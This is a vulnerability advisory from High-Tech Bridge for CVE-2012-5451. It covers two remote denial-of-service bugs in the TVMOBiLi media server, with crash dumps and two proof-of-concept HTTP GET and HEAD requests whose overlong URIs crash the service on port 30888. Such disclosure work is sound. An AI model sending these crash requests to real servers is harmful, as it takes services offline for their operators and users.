High-Tech Bridge Security Advisories are CVE Compatible    High-Tech Bridge Security Advisories CWE Compatibility    High-Tech Bridge Security Advisories CVSS Adopters
Vendor Statistics

286 software vendors have fixed 926 vulnerabilities in their products thanks to High-Tech Bridge Security Research Lab.

Patch Available Upon Disclosure

2014 Q1: 87%2013 Q2: 92%
2013 Q4: 67%2013 Q1: 100%
2013 Q3: 77%2012 Q4: 68%

Vendor Average Time to Patch

2014 Q1: 5 days 2013 Q2: 30 days
2013 Q4: 8 days 2013 Q1: 13 days
2013 Q3: 13 days 2012 Q4: 26 days

High-Tech Bridge Newsletter

Subscribe to our newsletter and receive some or all of our corporate news, invitations to security events or HTB Security Advisories – you choose what you want to receive.

TVMOBiLi Media Server Multiple Remote DoS Vulnerabilities

Advisory ID:HTB23120
Product:TVMOBiLi media server
Vendor:TVMOBiLi
Vulnerable Versions:2.1.0.3557 and probably prior version
Tested Version:2.1.0.3557 in Windows XP SP3 32 bits
Advisory Publication:October 15, 2012 [without technical details]
Vendor Notification:October 15, 2012
Vendor Fix:November 21, 2012
Public Disclosure:December 5, 2012
Latest Update:November 27, 2012
Vulnerability Type:Improper Handling of Length Parameter Inconsistency [CWE-130]
CVE Reference:CVE-2012-5451
Risk Level:Medium
CVSSv2 Base Score:5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge Security Research Lab has discovered 2 remote DoS vulnerabilities in TVMOBiLi Media server, which could be exploited to crash remote server with malicious HTTP requests.

1) Improper Handling of Length Parameter Inconsistency in TVMOBiLi: CVE-2012-5451

1.1 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP GET request of 161, 257 or 255 characters long to 30888/TCP port (default TVMOBiLi's server port) and cause a stack-based buffer overrun that will crash tvMobiliService service.

Crash details

MSVCR100.dll:78abe2ad mov [edx], al from thread 1860 caused access violation when attempting to write to 0x0170e000
CONTEXT DUMP
EIP: 78abe2ad mov [edx],al
EAX: 00b8fd3e ( 12123454) -> injected stream (stack)
EBX: 00000019 ( 25) -> N/A
ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A
EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack)
EBP: 00b8f61c ( 12121628) -> sx xx'(x(x0kxxT$|$| (stack)
ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx' (stack)
+00: 78abe2ff (2024530687) -> N/A
+04: 00000000 ( 0) -> N/A
+08: 0000011f ( 287) -> N/A
+0c: 00000002 ( 2) -> N/A
+10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A

disasm around:
0x78abe28e jnc 0x78abe2f9
0x78abe290 outsb
0x78abe292 and fs:[eax],al
0x78abe296 test byte [ecx+0xc],0x40


Proof of Concept
The following HTTP GET request will crash vulnerable tvMobiliService service remotely:

GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None


1.2 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of 255, 257 or 260 characters long to 30888/TCP port and cause a stack-based buffer overrun that will crash tvMobiliService service.

Crash details
MSVCR100.dll:78abe2ad mov [edx], al from thread 1745 caused access violation when attempting to write to 0x0170e000

CONTEXT DUMP
EIP: 78abe2ad mov [edx],al
EAX: 00b8fd3e ( 12123454) -> injected stream (stack)
EBX: 00000019 ( 25) -> N/A
ECX: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp N/A
EDI: 00b8f8d0 ( 12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack)
EBP: 00b8f61c ( 12121628) -> sx xx'(x(x0kxxT$|$| (stack)
ESP: 00b8f60c ( 12121612) -> xnx|8xx|8xp+| ==sx xx' (stack)
+00: 78abe2ff (2024530687) -> N/A
+04: 00000000 ( 0) -> N/A
+08: 0000011f ( 287) -> N/A
+0c: 00000002 ( 2) -> N/A
+10: 00b8f8ac ( 12122284) -> Aax$=pppB;p$= @==ypp N/A

disasm around:
0x78abe28e jnc 0x78abe2f9
0x78abe290 outsb
0x78abe292 and fs:[eax],al
0x78abe296 test byte [ecx+0xc],0x40


Proof of Concept
The following HTTP HEAD request will crash vulnerable tvMobiliService service remotely:

HEAD /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
HOST: 192.168.10.12:30888
Referer: 192.168.10.12:30888
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None


Solution:
Upgrade to TVMOBiLi 2.1.0.3974

More Information:
http://forum.tvmobili.com/viewtopic.php?f=7&t=55117
http://dev.tvmobili.com/changelog.php


ImmuniWeb® by High-Tech Bridge


References:
[1] High-Tech Bridge Advisory HTB23120 - https://www.htbridge.com/advisory/HTB23120 - TvMobili Media Server Multiple Remote DoS Vulnerabilities.
[2] TVMOBiLi LTD - http://www.tvmobili.com - TVMOBiLi is a free Media server for Mac, Windows, and Linux Operating Systems.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.